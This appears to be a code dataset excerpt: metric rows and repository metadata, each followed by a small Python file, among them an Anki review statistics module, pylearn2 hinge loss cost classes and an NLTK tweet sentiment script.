| 41.271845 | 101 | 0.668313 | 842 | 4,251 | 3.36342 | 0.206651 | 0.038136 | 0.025424 | 0.025424 | 0.038136 | 0.021186 | 0 | 0 | 0 | 0 | 0 | 0.287296 | 0.107504 | 4,251 | 102 | 102 | 41.676471 | 0.459146 | 0.01482 | 0 | 0.025316 | 0 | 0.518987 | 0.715966 | 0.625626 | 0 | 1 | 0 | 0 | 0 | 1 | 0.063291 | false | 0 | 0.012658 | 0.012658 | 0.113924 | 0.101266 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
384236e370b45275685506bccd09da961477be46 | 233 | py | Python | exquiro/models/class_diagram/attribute.py | xhusar2/conceptual_model_parser | 63eea4ab8b967a6d2ee612ffb4a06b93e97d0043 | [
"MIT"
] | null | null | null | exquiro/models/class_diagram/attribute.py | xhusar2/conceptual_model_parser | 63eea4ab8b967a6d2ee612ffb4a06b93e97d0043 | [
"MIT"
] | null | null | null | exquiro/models/class_diagram/attribute.py | xhusar2/conceptual_model_parser | 63eea4ab8b967a6d2ee612ffb4a06b93e97d0043 | [
"MIT"
] | null | null | null |
class Attribute:
name = ""
id = ""
attributes = []
def __init__(self, attrib_id, name):
self.name = name
self.id = attrib_id
def __str__(self):
return f'id:{self.id} name: {self.name}'
| 16.642857 | 48 | 0.540773 | 29 | 233 | 4 | 0.413793 | 0.206897 | 0.172414 | 0.241379 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.321888 | 233 | 13 | 49 | 17.923077 | 0.734177 | 0 | 0 | 0 | 0 | 0 | 0.12987 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0 | 0.111111 | 0.777778 | 0 | 1 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
69d3a8ab2872b70adc61bba4d49a0fadf1054651 | 25 | py | Python | __init__.py | vishalbelsare/RLS | 877358be0671129bf5c31aedbdf31bed38e9297a | [
"MIT"
] | 1 | 2021-07-24T18:13:00.000Z | 2021-07-24T18:13:00.000Z | __init__.py | vishalbelsare/RLS | 877358be0671129bf5c31aedbdf31bed38e9297a | [
"MIT"
] | null | null | null | __init__.py | vishalbelsare/RLS | 877358be0671129bf5c31aedbdf31bed38e9297a | [
"MIT"
] | 1 | 2021-07-24T18:13:01.000Z | 2021-07-24T18:13:01.000Z | from RLS.RLS import RLS
| 12.5 | 24 | 0.76 | 5 | 25 | 3.8 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 25 | 1 | 25 | 25 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
69d879d34b083c6f145914643ec4b88f44e5bd04 | 30 | py | Python | primer/module.py | YunYouJun/python-learn | e41ce8ca289fbb6e1a14e07aee6d4b797e6d5d8c | [
"MIT"
] | null | null | null | primer/module.py | YunYouJun/python-learn | e41ce8ca289fbb6e1a14e07aee6d4b797e6d5d8c | [
"MIT"
] | null | null | null | primer/module.py | YunYouJun/python-learn | e41ce8ca289fbb6e1a14e07aee6d4b797e6d5d8c | [
"MIT"
] | null | null | null | from math import pi
print(pi)
| 10 | 19 | 0.766667 | 6 | 30 | 3.833333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 30 | 2 | 20 | 15 | 0.92 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
69fbbaee70c4c46e85c50e9ae7cd23771cea7460 | 310 | py | Python | Package Bundler.py | STPackageBundler/package-bundler | 6c2a97f7b1db2dc5d6afff72557c09927095d851 | [
"MIT"
] | 7 | 2015-01-24T05:22:31.000Z | 2018-07-12T07:30:46.000Z | Package Bundler.py | STPackageBundler/package-bundler | 6c2a97f7b1db2dc5d6afff72557c09927095d851 | [
"MIT"
] | null | null | null | Package Bundler.py | STPackageBundler/package-bundler | 6c2a97f7b1db2dc5d6afff72557c09927095d851 | [
"MIT"
] | null | null | null | from .package_bundler.commands.load import PackageBundlerLoadCommand
from .package_bundler.commands.manager import PackageBundlerManagerCommand
from .package_bundler.commands.create import PackageBundlerCreateBundleCommand
from .package_bundler.events_listeners.project_loader import ProjectLoaderEventListener | 77.5 | 87 | 0.912903 | 30 | 310 | 9.233333 | 0.533333 | 0.158845 | 0.259928 | 0.281588 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.048387 | 310 | 4 | 87 | 77.5 | 0.938983 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3858b41dd95dee29fa3d8ad28d00fdf8453285d4 | 27 | py | Python | tests/test_diss.py | mvcisback/DISS | 3ac94d62d2f10e2642a5ea7ef27b1ed045664abc | [
"MIT"
] | null | null | null | tests/test_diss.py | mvcisback/DISS | 3ac94d62d2f10e2642a5ea7ef27b1ed045664abc | [
"MIT"
] | null | null | null | tests/test_diss.py | mvcisback/DISS | 3ac94d62d2f10e2642a5ea7ef27b1ed045664abc | [
"MIT"
] | null | null | null | def test_smoke():
pass
| 9 | 17 | 0.62963 | 4 | 27 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.259259 | 27 | 2 | 18 | 13.5 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
389e5cfb89c3ee3cd5c0cd63b9d29182b8d8435e | 87 | py | Python | backend/users/tests.py | NumanIbnMazid/numanibnmazid.com | 905e3afab285316d88bafa30dc080dfbb0611731 | [
"MIT"
] | 1 | 2022-01-28T18:20:19.000Z | 2022-01-28T18:20:19.000Z | backend/users/tests.py | NumanIbnMazid/numanibnmazid.com | 905e3afab285316d88bafa30dc080dfbb0611731 | [
"MIT"
] | null | null | null | backend/users/tests.py | NumanIbnMazid/numanibnmazid.com | 905e3afab285316d88bafa30dc080dfbb0611731 | [
"MIT"
] | null | null | null | # import test cases
from users.test_cases.user_test_cases import UserTestCase # NOQA
| 21.75 | 65 | 0.816092 | 13 | 87 | 5.230769 | 0.615385 | 0.397059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 87 | 3 | 66 | 29 | 0.906667 | 0.252874 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
38b5485bd4c08353afb9b1a765fa78134b2a3049 | 77 | py | Python | quantipy/core/tools/view/__init__.py | encount/quantipy3 | 01fe350b79594ba162cd48ce91f6e547e74265fe | [
"MIT"
] | null | null | null | quantipy/core/tools/view/__init__.py | encount/quantipy3 | 01fe350b79594ba162cd48ce91f6e547e74265fe | [
"MIT"
] | null | null | null | quantipy/core/tools/view/__init__.py | encount/quantipy3 | 01fe350b79594ba162cd48ce91f6e547e74265fe | [
"MIT"
] | null | null | null | from . import agg
from . import meta
from . import struct
from . import query | 19.25 | 20 | 0.753247 | 12 | 77 | 4.833333 | 0.5 | 0.689655 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.194805 | 77 | 4 | 21 | 19.25 | 0.935484 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2a627d577441bd87ff76b1f7fd715d75193c3aa1 | 177 | py | Python | modules/rapids_modules/transform/data_obj.py | goosen78/gQuant | cc0bff4ac524ccfbe8097acd647a8b3fad5fe578 | [
"Apache-2.0"
] | null | null | null | modules/rapids_modules/transform/data_obj.py | goosen78/gQuant | cc0bff4ac524ccfbe8097acd647a8b3fad5fe578 | [
"Apache-2.0"
] | null | null | null | modules/rapids_modules/transform/data_obj.py | goosen78/gQuant | cc0bff4ac524ccfbe8097acd647a8b3fad5fe578 | [
"Apache-2.0"
] | null | null | null | class NormalizationData(object):
def __init__(self, data):
self.data = data
class ProjectionData(object):
def __init__(self, data):
self.data = data
| 16.090909 | 32 | 0.649718 | 20 | 177 | 5.35 | 0.4 | 0.299065 | 0.242991 | 0.317757 | 0.616822 | 0.616822 | 0.616822 | 0.616822 | 0 | 0 | 0 | 0 | 0.248588 | 177 | 10 | 33 | 17.7 | 0.804511 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
aa5019510be8dcde3a8d23f7f8be5bc4a92c92d3 | 124 | py | Python | solutions/variance.py | jsamoocha/python-for-datascience | 1b8f8b96944eb23cce2b7200f66361dd223ce13e | [
"MIT"
] | null | null | null | solutions/variance.py | jsamoocha/python-for-datascience | 1b8f8b96944eb23cce2b7200f66361dd223ce13e | [
"MIT"
] | null | null | null | solutions/variance.py | jsamoocha/python-for-datascience | 1b8f8b96944eb23cce2b7200f66361dd223ce13e | [
"MIT"
] | null | null | null | def variance(numbers):
mu = sum(numbers) / len(numbers)
return sum([(n - mu) ** 2 for n in numbers]) / len(numbers)
| 31 | 63 | 0.612903 | 19 | 124 | 4 | 0.578947 | 0.263158 | 0.447368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010309 | 0.217742 | 124 | 3 | 64 | 41.333333 | 0.773196 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
aa5482072d2a74021ef1f149b710759a0ec7c8be | 216 | py | Python | Codewars/7kyu/complementary-dna/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | 7 | 2017-09-20T16:40:39.000Z | 2021-08-31T18:15:08.000Z | Codewars/7kyu/complementary-dna/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | Codewars/7kyu/complementary-dna/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | # Python - 3.6.0
Test.assert_equals(DNA_strand('AAAA'), 'TTTT', 'String AAAA is')
Test.assert_equals(DNA_strand('ATTGC'), 'TAACG', 'String ATTGC is')
Test.assert_equals(DNA_strand('GTAT'), 'CATA', 'String GTAT is')
| 36 | 67 | 0.708333 | 34 | 216 | 4.323529 | 0.5 | 0.204082 | 0.326531 | 0.387755 | 0.537415 | 0.367347 | 0 | 0 | 0 | 0 | 0 | 0.015306 | 0.092593 | 216 | 5 | 68 | 43.2 | 0.734694 | 0.064815 | 0 | 0 | 0 | 0 | 0.345 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
aa65aeec14b5b9a13426da76359de50ea5eece36 | 3,538 | py | Python | ankistats/stats.py | nogira/anki-stats | 81fc4b11ff958d9844f95679a1fe596b2865d29c | [
"MIT"
] | null | null | null | ankistats/stats.py | nogira/anki-stats | 81fc4b11ff958d9844f95679a1fe596b2865d29c | [
"MIT"
] | null | null | null | ankistats/stats.py | nogira/anki-stats | 81fc4b11ff958d9844f95679a1fe596b2865d29c | [
"MIT"
] | null | null | null | from .tables import *
def stats_lapse_retention(
start_date: str = "",
end_date: str = ""
):
"""
    Get the percentage of correct answers.
    Date input in the format "DD-MM-YY".
"""
df = tbl_reviews()
if start_date:
date = pd.to_datetime(start_date, format="%d-%m-%y")
df = df[df.Review_ID > date]
if end_date:
date = pd.to_datetime(end_date, format="%d-%m-%y")
df = df[df.Review_ID < date]
track_lapses = []
wrong_count = 0
right_count = 0
def track_lapse_stats(row) -> None:
nonlocal track_lapses
nonlocal wrong_count
nonlocal right_count
is_relearning = row['Review_Type'] == 'Relearning'
if is_relearning:
track_lapses.append(row['Card_ID'])
        # the very next review after the Card_ID is stored will be the first
        # review after relearning.
        # however, to make sure the card hasn't been reset to new, check that
        # the card isn't new (i.e. 'Learning'); if new, remove it from the list
elif row['Card_ID'] in track_lapses:
if row['Review_Type'] == 'Learning':
track_lapses.remove(row['Card_ID'])
elif row['Review_Answer'] == 'Wrong':
wrong_count += 1
else:
right_count += 1
track_lapses.remove(row['Card_ID'])
df.apply(track_lapse_stats, axis=1)
print("Right:", right_count)
print("Wrong:", wrong_count)
print("Fraction Correct:", right_count / (right_count + wrong_count))
def stats_learning_graduation_retention(
graduation_interval,
pre_graduation_interval,
start_date: str = "",
end_date: str = ""
):
"""
    Get the percentage of correct answers on learning graduation intervals.
    graduation_interval and pre_graduation_interval in the format "4 days",
    "10 min", etc.
    Date input in the format "DD-MM-YY".
"""
df = tbl_reviews()
if start_date:
date = pd.to_datetime(start_date, format="%d-%m-%y")
df = df[df.Review_ID > date]
if end_date:
date = pd.to_datetime(end_date, format="%d-%m-%y")
df = df[df.Review_ID < date]
track_lapses = []
wrong_count = 0
right_count = 0
def track_lapse_stats(row) -> None:
nonlocal track_lapses
nonlocal wrong_count
nonlocal right_count
is_learning = row['Review_Type'] == 'Learning'
is_last_step = (
row['Review_New_Interval'] == pd.Timedelta(graduation_interval) and
row['Review_Last_Interval'] == pd.Timedelta(pre_graduation_interval)
)
if is_learning and is_last_step:
track_lapses.append(row['Card_ID'])
        # the very next review after the Card_ID is stored will be the first
        # review after learning.
        # however, to make sure the card hasn't been reset to new, check that
        # the card isn't new (i.e. 'Learning'); if new, remove it from the list
elif row['Card_ID'] in track_lapses:
if row['Review_Type'] == 'Learning':
track_lapses.remove(row['Card_ID'])
elif row['Review_Answer'] == 'Wrong':
wrong_count += 1
else:
right_count += 1
track_lapses.remove(row['Card_ID'])
df.apply(track_lapse_stats, axis=1)
print("Right:", right_count)
print("Wrong:", wrong_count)
print("Fraction Correct:", right_count / (right_count + wrong_count))
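Both functions above parse their optional date bounds with `pd.to_datetime(..., format="%d-%m-%y")`. The equivalent stdlib parse, shown here only to illustrate the "DD-MM-YY" contract the docstrings describe:

```python
from datetime import datetime

# "%d-%m-%y" matches the "DD-MM-YY" strings the stats functions accept.
date = datetime.strptime("25-12-21", "%d-%m-%y")
print(date.year, date.month, date.day)  # 2021 12 25
```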
| 29.483333 | 81 | 0.596099 | 462 | 3,538 | 4.335498 | 0.201299 | 0.065901 | 0.035946 | 0.023964 | 0.77983 | 0.77983 | 0.77983 | 0.77983 | 0.77983 | 0.77983 | 0 | 0.005225 | 0.296778 | 3,538 | 119 | 82 | 29.731092 | 0.799839 | 0.201526 | 0 | 0.821918 | 0 | 0 | 0.107942 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054795 | false | 0 | 0.013699 | 0 | 0.068493 | 0.082192 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
aa827e294f9285097e86e2726f649c0eddadd157 | 3,415 | py | Python | pylearn2/costs/hinge_loss.py | BouchardLab/pylearn2 | 4cab785b870d22cd9e85a5f536d4cac234b6bf60 | [
"BSD-3-Clause"
] | null | null | null | pylearn2/costs/hinge_loss.py | BouchardLab/pylearn2 | 4cab785b870d22cd9e85a5f536d4cac234b6bf60 | [
"BSD-3-Clause"
] | null | null | null | pylearn2/costs/hinge_loss.py | BouchardLab/pylearn2 | 4cab785b870d22cd9e85a5f536d4cac234b6bf60 | [
"BSD-3-Clause"
] | null | null | null | """
Hinge loss costs.
"""
__authors__ = 'Jesse Livezey, Brian Cheung'
from theano.compat.python2x import OrderedDict
from pylearn2.costs.cost import Cost, DefaultDataSpecsMixin
from pylearn2.expr.nnet import HingeL2, HingeL1, Misclass
class HingeLoss(DefaultDataSpecsMixin, Cost):
supervised = True
def get_monitoring_channels(self, model, data):
space, source = self.get_data_specs(model)
space.validate(data)
X, Y = data
Y_hat = model.fprop(X)
rval = OrderedDict()
name = model.layers[-1].layer_name+'_misclass'
rval[name] = Misclass(Y, Y_hat)
return rval
def expr(self, model, data):
        raise ValueError('Abstract HingeLoss class '
                         'should not be used directly.')
class HingeLossL2(HingeLoss):
def expr(self, model, data):
space, source = self.get_data_specs(model)
space.validate(data)
X, Y = data
Y_hat = model.fprop(X)
cost = HingeL2(Y, Y_hat)
cost.name = 'hingel2'
return cost
class HingeLossL1(HingeLoss):
def expr(self, model, data):
space, source = self.get_data_specs(model)
space.validate(data)
X, Y = data
Y_hat = model.fprop(X)
cost = HingeL1(Y, Y_hat)
cost.name = 'hingel1'
return cost
class DropoutHingeLossL2(HingeLoss):
def __init__(self, default_input_include_prob=.5, input_include_probs=None,
default_input_scale=2., input_scales=None, per_example=True):
if input_include_probs is None:
input_include_probs = {}
if input_scales is None:
input_scales = {}
self.__dict__.update(locals())
del self.self
def expr(self, model, data):
space, source = self.get_data_specs(model)
space.validate(data)
X, Y = data
Y_hat = model.dropout_fprop(
X,
default_input_include_prob=self.default_input_include_prob,
input_include_probs=self.input_include_probs,
default_input_scale=self.default_input_scale,
input_scales=self.input_scales,
per_example=self.per_example)
cost = HingeL2(Y, Y_hat)
cost.name = 'hingel2'
return cost
class DropoutHingeLossL1(HingeLoss):
def __init__(self, default_input_include_prob=.5, input_include_probs=None,
default_input_scale=2., input_scales=None, per_example=True):
if input_include_probs is None:
input_include_probs = {}
if input_scales is None:
input_scales = {}
self.__dict__.update(locals())
del self.self
def expr(self, model, data):
space, source = self.get_data_specs(model)
space.validate(data)
X, Y = data
Y_hat = model.dropout_fprop(
X,
default_input_include_prob=self.default_input_include_prob,
input_include_probs=self.input_include_probs,
default_input_scale=self.default_input_scale,
input_scales=self.input_scales,
per_example=self.per_example)
cost = HingeL1(Y, Y_hat)
cost.name = 'hingel1'
return cost
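For reference, the scalar binary case of the losses these classes wrap. The pylearn2 `HingeL1`/`HingeL2` expressions operate on one-hot Theano tensors, so this plain-Python sketch only illustrates the margin idea, not the library's implementation:

```python
def hinge_l1(y, y_hat):
    # Binary hinge loss: zero once the margin y * y_hat reaches 1.
    return max(0.0, 1.0 - y * y_hat)

def hinge_l2(y, y_hat):
    # Squared variant penalizes margin violations quadratically.
    return hinge_l1(y, y_hat) ** 2

print(hinge_l1(1, 0.5), hinge_l2(1, 0.5))  # 0.5 0.25
```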
| 32.836538 | 87 | 0.595022 | 394 | 3,415 | 4.873096 | 0.200508 | 0.1 | 0.088542 | 0.071875 | 0.755729 | 0.745313 | 0.745313 | 0.745313 | 0.745313 | 0.745313 | 0 | 0.009495 | 0.321523 | 3,415 | 103 | 88 | 33.15534 | 0.819163 | 0.004978 | 0 | 0.792683 | 0 | 0 | 0.034513 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097561 | false | 0 | 0.036585 | 0 | 0.268293 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
aa9380f4b2ce3efca51bbd6da3de1f92185f4f1f | 6,825 | py | Python | main_NLTK.py | Jordan396/Twitter-Sentiment-Analysis | c81abca584ec040c5fa8f284845a5d9cdbb4bbc7 | [
"MIT"
] | 10 | 2019-10-12T01:40:25.000Z | 2021-11-28T19:03:56.000Z | main_NLTK.py | JordanTanCH/Basic_Twitter_Sentiment_Analysis | c81abca584ec040c5fa8f284845a5d9cdbb4bbc7 | [
"MIT"
] | null | null | null | main_NLTK.py | JordanTanCH/Basic_Twitter_Sentiment_Analysis | c81abca584ec040c5fa8f284845a5d9cdbb4bbc7 | [
"MIT"
] | 5 | 2019-04-17T02:34:56.000Z | 2021-01-29T21:47:05.000Z | '''
Python 3.6, Python NLTK model
This file contains the code required to test the various models under the Python NLTK model.
The results will be written into their individual output file in a CSV format.
Instructions to execute the file can be found at the bottom of the file.
'''
import csv
from nltk.sentiment.vader import SentimentIntensityAnalyzer
from nltk import tokenize
import tweetCleaner
import tweetProcesser
sentiment = SentimentIntensityAnalyzer()
def NLTKCleanRaw():
'''
Raw NLTK model
'''
tweet_counter = 0
with open("results_nltk_raw.txt","w", encoding = "utf-8") as postresults:
newWriter = csv.writer(postresults, delimiter='\t', quotechar='|', quoting=csv.QUOTE_MINIMAL)
with open("raw_twitter.txt","r", encoding = "utf-8") as postprocessed:
for line in postprocessed.readlines():
total_score = 0
tweet_counter += 1
try:
print("Processing tweet: {}".format(tweet_counter))
tweet = tweetCleaner.lowercase(line)
tweet = tweetCleaner.StopWordRemover(tweet)
tweet = tweetCleaner.removeSpecialChars(tweet)
tweet = tweetCleaner.removeAllNonAlpha(tweet)
tweet = tweetCleaner.lemmatizer(tweet)
lines_list = tokenize.sent_tokenize(tweet)
for sentence in lines_list:
ss = sentiment.polarity_scores(sentence)
total_score -= ss["neg"]
total_score += ss["pos"]
total_score = round(total_score,3)
if total_score == 0:
newWriter.writerow([0, "neutral"])
elif total_score > 0:
newWriter.writerow([total_score, "positive"])
else:
newWriter.writerow([total_score, "negative"])
except:
newWriter.writerow([0, "neutral"])
print("ERROR processing tweet: {}".format(tweet_counter))
def NLTKCleanAbbrev():
"""
NLTK model with extended abbreviations
"""
tweet_counter = 0
tweetProcesser.abbreviation_extender()
with open("results_nltk_abbrev.txt","w", encoding = "utf-8") as postresults:
newWriter = csv.writer(postresults, delimiter='\t', quotechar='|', quoting=csv.QUOTE_MINIMAL)
with open("abbreviations_twitter.txt","r", encoding = "utf-8") as postprocessed:
for line in postprocessed.readlines():
total_score = 0
tweet_counter += 1
try:
print("Processing tweet: {}".format(tweet_counter))
                    tweet = tweetCleaner.lowercase(line)
                    tweet = tweetCleaner.StopWordRemover(tweet)
tweet = tweetCleaner.removeSpecialChars(tweet)
tweet = tweetCleaner.removeAllNonAlpha(tweet)
tweet = tweetCleaner.lemmatizer(tweet)
lines_list = tokenize.sent_tokenize(tweet)
for sentence in lines_list:
ss = sentiment.polarity_scores(sentence)
total_score -= ss["neg"]
total_score += ss["pos"]
total_score = round(total_score,3)
if total_score == 0:
newWriter.writerow([0, "neutral"])
elif total_score > 0:
newWriter.writerow([total_score, "positive"])
else:
newWriter.writerow([total_score, "negative"])
except:
newWriter.writerow([0, "neutral"])
print("ERROR processing tweet: {}".format(tweet_counter))
def NLTKCleanEmoji():
"""
NLTK model with emoticon scoring
"""
tweet_counter = 0
with open("results_nltk_emoji.txt","w", encoding = "utf-8") as postresults:
newWriter = csv.writer(postresults, delimiter='\t', quotechar='|', quoting=csv.QUOTE_MINIMAL)
with open("raw_twitter.txt","r", encoding = "utf-8") as postprocessed:
for line in postprocessed.readlines():
total_score = 0
tweet_counter += 1
try:
print("Processing tweet: {}".format(tweet_counter))
tweet = tweetCleaner.lowercase(line)
tweet = tweetCleaner.StopWordRemover(tweet)
tweet = tweetCleaner.removeSpecialChars(tweet)
tweet,total_score = tweetProcesser.emoticon_score(tweet)
tweet = tweetCleaner.removeAllNonAlpha(tweet)
tweet = tweetCleaner.lemmatizer(tweet)
lines_list = tokenize.sent_tokenize(tweet)
for sentence in lines_list:
ss = sentiment.polarity_scores(sentence)
total_score -= ss["neg"]
total_score += ss["pos"]
total_score = round(total_score,3)
if total_score == 0:
newWriter.writerow([0, "neutral"])
elif total_score > 0:
newWriter.writerow([total_score, "positive"])
else:
newWriter.writerow([total_score, "negative"])
except:
newWriter.writerow([0, "neutral"])
print("ERROR processing tweet: {}".format(tweet_counter))
def NLTKCleanAbbrevEmoji():
"""
NLTK model with extended abbreviations AND emoticon scoring
"""
tweet_counter = 0
tweetProcesser.abbreviation_extender()
with open("results_nltk_abbrev_emoji.txt","w", encoding = "utf-8") as postresults:
newWriter = csv.writer(postresults, delimiter='\t', quotechar='|', quoting=csv.QUOTE_MINIMAL)
with open("abbreviations_twitter.txt","r", encoding = "utf-8") as postprocessed:
for line in postprocessed.readlines():
total_score = 0
tweet_counter += 1
try:
print("Processing tweet: {}".format(tweet_counter))
tweet = tweetCleaner.lowercase(line)
tweet = tweetCleaner.StopWordRemover(tweet)
tweet = tweetCleaner.removeSpecialChars(tweet)
tweet,total_score = tweetProcesser.emoticon_score(tweet)
tweet = tweetCleaner.removeAllNonAlpha(tweet)
tweet = tweetCleaner.lemmatizer(tweet)
lines_list = tokenize.sent_tokenize(tweet)
for line in lines_list:
ss = sentiment.polarity_scores(line)
total_score -= ss["neg"]
total_score += ss["pos"]
total_score = round(total_score,3)
if total_score == 0:
newWriter.writerow([0, "neutral"])
elif total_score > 0:
newWriter.writerow([total_score, "positive"])
else:
newWriter.writerow([total_score, "negative"])
except:
newWriter.writerow([0, "neutral"])
print("ERROR processing tweet: {}".format(tweet_counter))
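Each function above aggregates VADER's per-sentence polarity the same way: subtract the `neg` score, add the `pos` score, round, then bucket the total. That aggregation, isolated from NLTK with hypothetical polarity dicts standing in for `sentiment.polarity_scores(...)`:

```python
# Hypothetical polarity dicts; real ones come from polarity_scores().
scores = [{"neg": 0.1, "pos": 0.5}, {"neg": 0.3, "pos": 0.0}]

total_score = round(sum(s["pos"] - s["neg"] for s in scores), 3)
label = "positive" if total_score > 0 else "negative" if total_score < 0 else "neutral"
print(total_score, label)  # 0.1 positive
```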
print("====================TEST BEGIN=======================")
'''
BASIC: This is the main function we will be executing.
It combines all the cleaning and processing steps described in the GitHub README.
Run this script in your python command shell.
'''
NLTKCleanAbbrevEmoji()
'''
ADVANCED: Sometimes, performing excessive cleaning operations on the input may worsen the accuracy of the model.
Hence, here are several other models you may wish to test for accuracy comparison.
The description of the models may be found under the individual functions above.
To test a model, simply comment the above "Basic" model and uncomment any of the models below.
Run this script in your python command shell.
'''
#NLTKCleanRaw()
#NLTKCleanAbbrev()
#NLTKCleanEmoji()
print("====================TEST END=========================")
